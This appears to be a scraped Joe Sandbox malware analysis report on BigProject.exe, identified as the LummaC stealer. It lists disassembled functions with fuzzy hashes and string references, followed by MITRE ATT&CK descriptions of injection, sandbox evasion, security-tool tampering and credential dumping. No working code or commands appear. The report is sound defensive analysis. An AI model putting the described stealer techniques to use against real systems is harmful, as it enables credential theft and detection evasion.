Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c996c3f4605880eb5795293c8fc84fa0ba55b563aa94cfbc2b65958c9b9224e
Instruction ID: 89cd8c3f6ac805753dcfa7ea52abb159a623b373aaffce4ab273b97bd3830c78
Opcode Fuzzy Hash: 6c996c3f4605880eb5795293c8fc84fa0ba55b563aa94cfbc2b65958c9b9224e
Instruction Fuzzy Hash: CFB10575608790DFD714DF24E891A2BB7E2EF8A314F488A6DF0D5872A2D7388905CB16

Function 0043AEC0 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 28138e8c65325f641ce846c5d717fbfcd9e0028e0a671fa80ee9e5ed8af67cde
Instruction ID: ba880319810bdb8e213e259538359e713a98a4b2945b2457ae3d4c78796ecc2a
Opcode Fuzzy Hash: 28138e8c65325f641ce846c5d717fbfcd9e0028e0a671fa80ee9e5ed8af67cde
Instruction Fuzzy Hash: 47512A357043008FE7188F28C89577BB7E2EB9A320F18A62ED5D597392D7389C41C78A

Function 004385E0 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93ce565895c2d767d3f4f3cf703cee2db26bdababecfc0e7e91b354ce90ac481
Instruction ID: 19c9bc1ea9186e56c23c5e66cc144f5345884b6a785bfb5c303e44cb60fc86fa
Opcode Fuzzy Hash: 93ce565895c2d767d3f4f3cf703cee2db26bdababecfc0e7e91b354ce90ac481
Instruction Fuzzy Hash: 915126746083009BE7109F29DC45B2BB7E6EB89704F14982DF5C597292DB39DC05CBAB

Function 00425E70 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb453cfe87c3d4895fcef5adcba70af742de5fc44f30238646acffd3f92754e0
Instruction ID: 6e37d88637f30dcf1ca5a39760ca9fc235c391d288c19f204446c63a880f3ae7
Opcode Fuzzy Hash: fb453cfe87c3d4895fcef5adcba70af742de5fc44f30238646acffd3f92754e0
Instruction Fuzzy Hash: 0951AE30B483648FD710DA28A480267BBD2DF95320F8A867ED4D44B3D6E67DD90DD389

Function 0041BF14 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd0ee31e4d4d6d9ac2fa2587f77cf37721911ca3e59ccc36e7bfb755614f87b6
Instruction ID: 2e66319cfaede8187dee7502eb2bdf6532bbee011b37898b3e62ff9ec94ea10c
Opcode Fuzzy Hash: bd0ee31e4d4d6d9ac2fa2587f77cf37721911ca3e59ccc36e7bfb755614f87b6
Instruction Fuzzy Hash: 2C1166324092905AC314CB289940737BBE19B87310F584A5DF4D6E32E1D728CC028B8A

Function 00435450 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 1bdb52c757136d0f491bb15e4131204bafb517a34a554dccf387603b88e59a22
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 4D11EC336055D40EC3198D3C84006657FD31AB7235F6953DAF4B89B2D3D5268DCA8359

Function 0042A700 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b077483ebbe41559666eb24632921f170fd341de44e0cb4593afb61e9b0962fb
Instruction ID: 3de76f9d274b52e90d2ef9e87ec8d3366dafd7d2e10265ff4f1f4711345407d1
Opcode Fuzzy Hash: b077483ebbe41559666eb24632921f170fd341de44e0cb4593afb61e9b0962fb
Instruction Fuzzy Hash: 7601B1F570171147D720AE51A9C0B27B2B86FC0748F19443EEC4457342DB7DEC29869E

Function 00428D93 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d6529698e20a6c769e7980251b0ca5e132cff0518f497c1ab8b00d6e4c79072
Instruction ID: 34e981112378c59cf45707eac27e4188cbaca79d234523b47ecff1cb0040ee73
Opcode Fuzzy Hash: 7d6529698e20a6c769e7980251b0ca5e132cff0518f497c1ab8b00d6e4c79072
Instruction Fuzzy Hash: 59016DB9C00624EFEF00AF55DC01B9E77B6AB0A324F0414A5E508BB392D731ED10CB95

Function 0043CA93 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b41fa5205d4ae5a3fd68479d9a62f5c8f3548fe329d4af70c97534e327c91f5
Instruction ID: 76115147780e5b0d0309e2a0309811062aead7e9691d40ac881d7231c88a4ab0
Opcode Fuzzy Hash: 3b41fa5205d4ae5a3fd68479d9a62f5c8f3548fe329d4af70c97534e327c91f5
Instruction Fuzzy Hash: 23E0D8FFD556600397548A235C02226B1936BDA628B1AB8788E9673707EA359C0741D8

Function 00423086 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3e382a35f6a7edaa88fbd4097d4fd738d9cf468eed6d2bef4b4d717b7d72e8c
Instruction ID: 8488e0a8640df04fcf481087a0a0e2354c4894f8e99b76394d31cfc5082ce78b
Opcode Fuzzy Hash: d3e382a35f6a7edaa88fbd4097d4fd738d9cf468eed6d2bef4b4d717b7d72e8c
Instruction Fuzzy Hash: 6BE01279C11100BFDE046B11FC0161CBA72B76630BF46213AE40873232EF35A436A75D

Function 00427AD3 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
Instruction ID: 6e3621e5ba52bd1720ea54ad2d17b774c7841a8325dce5c8bd5a6b1d086829a3
Opcode Fuzzy Hash: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
Instruction Fuzzy Hash: 36D0C279815910CBDB047F01EC0216A73F4AB03389F04007CE88123263DB39D8288E8E

Function 0041C653 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
Instruction ID: f6de81edf4edbd36f0565e031b671f89904ab193cb181933f1b50bd017efe36b
Opcode Fuzzy Hash: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
Instruction Fuzzy Hash: C9D0127BF9210047DA099F11DD43775666393C770870DE1398805E3348DE3CD41A840E

Function 0040BFFD Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
Instruction ID: c40df4f40b565673574f117b3b393b79a76a3f9a491c552766a49f6821d64b0d
Opcode Fuzzy Hash: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
Instruction Fuzzy Hash: ACC012BCA4C10187D7088F10EC05735B636E797A01F14E125C441232A5C630A403860C

Function 0042984F Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
Instruction ID: 02d06448f02dd76ad61b8ab648816bdf30096f71157e536fee4757e064133957
Opcode Fuzzy Hash: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
Instruction Fuzzy Hash: AEA022F8C0A800C3E800CF20BC02030F23C830B2A8F00303AE00CF3203EA30E0088A0E

Function 00431715 Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 0043179A

Strings

B, xrefs: 00431871
B, xrefs: 0043188F
J, xrefs: 00431885
H, xrefs: 004318AD
0, xrefs: 00431980
G, xrefs: 004318A3
, xrefs: 0043183F
Q, xrefs: 00431853
], xrefs: 00431849
/, xrefs: 00431867
n, xrefs: 004318D1
;, xrefs: 00431817
4, xrefs: 00431821
#, xrefs: 00431899
m, xrefs: 004318B7
0, xrefs: 0043182B
^, xrefs: 0043185D
{, xrefs: 004318E1
O, xrefs: 0043187B
~, xrefs: 004318C1

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: AllocString
String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
API String ID: 2525500382-534244583
Opcode ID: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
Instruction ID: e2dddc40eb3f9dab4f65535c588d3d72a3f147e4bda3b82f36fbc837b78308fa
Opcode Fuzzy Hash: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
Instruction Fuzzy Hash: 8481066010CBC28AD322C63C881875FBFD15BE7224F184B9DE1F58B3E6D6A98146C767

Function 004312D1 Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 150memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00431360

Strings

#, xrefs: 0043145F
, xrefs: 00431405
], xrefs: 0043140F
~, xrefs: 00431487
0, xrefs: 0043153F
;, xrefs: 004313DD
^, xrefs: 00431423
J, xrefs: 0043144B
B, xrefs: 00431455
H, xrefs: 00431473
O, xrefs: 00431441
B, xrefs: 00431437
n, xrefs: 00431497
/, xrefs: 0043142D
m, xrefs: 0043147D
Q, xrefs: 00431419
0, xrefs: 004313F1
{, xrefs: 004314A7
4, xrefs: 004313E7
G, xrefs: 00431469

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: AllocString
String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
API String ID: 2525500382-534244583
Opcode ID: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
Instruction ID: e21bf8ef08eaefae2f6608d65dd533aaf672cde794620ee92b713000d27e8169
Opcode Fuzzy Hash: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
Instruction Fuzzy Hash: 9981F52010CBC289D326C63C885875FBFD16BE7224F184B9DE1F58B3E6D6A98146C727

Function 0042E9ED Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 94COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0042E9F6
VariantInit.OLEAUT32 ref: 0042EA05

Strings

,, xrefs: 0042EA90
<, xrefs: 0042EA50
>, xrefs: 0042EA58
(, xrefs: 0042EA80
8, xrefs: 0042EA40
4, xrefs: 0042EA70
*, xrefs: 0042EA88
:, xrefs: 0042EA48
W, xrefs: 0042EA34
b, xrefs: 0042EA3C
-, xrefs: 0042EA94
., xrefs: 0042EA98
6, xrefs: 0042EA78
Q, xrefs: 0042EA2C
2, xrefs: 0042EA68
0, xrefs: 0042EA60
T, xrefs: 0042EA24

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: Variant$ClearInit
String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
API String ID: 2610073882-1095711290
Opcode ID: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
Instruction ID: 67e1650e07e25dd8c979730081919a9ec74336f1c366e84b3847a4c8d399cf69
Opcode Fuzzy Hash: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
Instruction Fuzzy Hash: 19410921108BC1CED726CF388488646BFA16F66224F0886DDD8E54F3DBC775D51AC7A6

Function 0042F833 Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 85COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0042F83F
VariantInit.OLEAUT32 ref: 0042F84E

Strings

8, xrefs: 0042F88F
0, xrefs: 0042F8AF
(, xrefs: 0042F8CF
6, xrefs: 0042F8C7
-, xrefs: 0042F8E3
<, xrefs: 0042F89F
b, xrefs: 0042F88B
., xrefs: 0042F8E7
Q, xrefs: 0042F87B
:, xrefs: 0042F897
*, xrefs: 0042F8D7
W, xrefs: 0042F883
4, xrefs: 0042F8BF
,, xrefs: 0042F8DF
T, xrefs: 0042F873
2, xrefs: 0042F8B7
>, xrefs: 0042F8A7

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: Variant$ClearInit
String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
API String ID: 2610073882-1095711290
Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
Instruction ID: 5aee6742307bd22be2b72699ebf7517107c7abda4f37a595e92ffc77e439cf83
Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
Instruction Fuzzy Hash: 34410820108BC1CED726CF3C9488616BFA16B66224F488ADDD8E54F3DBC375D51ACB66

Function 00432409 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 90COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 0043244F

Strings

X, xrefs: 00432477
X, xrefs: 0043246D
e, xrefs: 004324B3
Q, xrefs: 0043249F
@, xrefs: 004324E5
E, xrefs: 00432495
[, xrefs: 004324C7
J, xrefs: 0043248B
L, xrefs: 004324BD
@, xrefs: 004324A9
H, xrefs: 004324D1
A, xrefs: 004324EA
C, xrefs: 00432481
[, xrefs: 004324DB

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: InitVariant
String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
API String ID: 1927566239-3011065302
Opcode ID: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
Instruction ID: 53b19800ce9beadd92bbeaf8c0dd5e513984ffb5c5a49c85e3815ab243118963
Opcode Fuzzy Hash: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
Instruction Fuzzy Hash: 0541097010C7C18AD365DB28849878BBFE16B96314F885A9CE6E94B3E2C7798409C757

Function 00432194 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 83COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 004321C6

Strings

C, xrefs: 004321FF
e, xrefs: 00432231
H, xrefs: 0043224F
X, xrefs: 004321F5
A, xrefs: 00432268
J, xrefs: 00432209
Q, xrefs: 0043221D
@, xrefs: 00432263
X, xrefs: 004321EB
[, xrefs: 00432245
@, xrefs: 00432227
E, xrefs: 00432213
L, xrefs: 0043223B
[, xrefs: 00432259

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: InitVariant
String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
API String ID: 1927566239-3011065302
Opcode ID: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
Instruction ID: f917ff13e8fa353cdd9af704c32342f25a9e0069aca0bae3d4b305f03d6e9fde
Opcode Fuzzy Hash: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
Instruction Fuzzy Hash: F841187000D7C18AD3619B28849874FBFE06BA7324F885A9DF6E84B3E2C77984498757

Function 00431EDD Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 92COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00431EE7
VariantInit.OLEAUT32 ref: 00431EFA

Strings

p, xrefs: 00431F9F
e, xrefs: 00431F5F
v, xrefs: 00431F3F
n, xrefs: 00431FAF
w, xrefs: 00431F4F
p, xrefs: 00431FBF
z, xrefs: 00431F6F
e, xrefs: 00431F1F
A, xrefs: 00431F8F
z, xrefs: 00431F2F

Memory Dump Source

Source File: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_CasPol.jbxd

Similarity

API ID: Variant$ClearInit
String ID: A$e$e$n$p$p$v$w$z$z
API String ID: 2610073882-1114116150
Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
Instruction ID: 776134ba1da329d7d35a817d8e2b42585fa70f537528e7a9cdeab4ed979499a7
Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
Instruction Fuzzy Hash: 2641383160C7C18ED331DB38885879BBFD1ABA6324F088AADD4E9872D6D7794505C763

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report BigProject.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

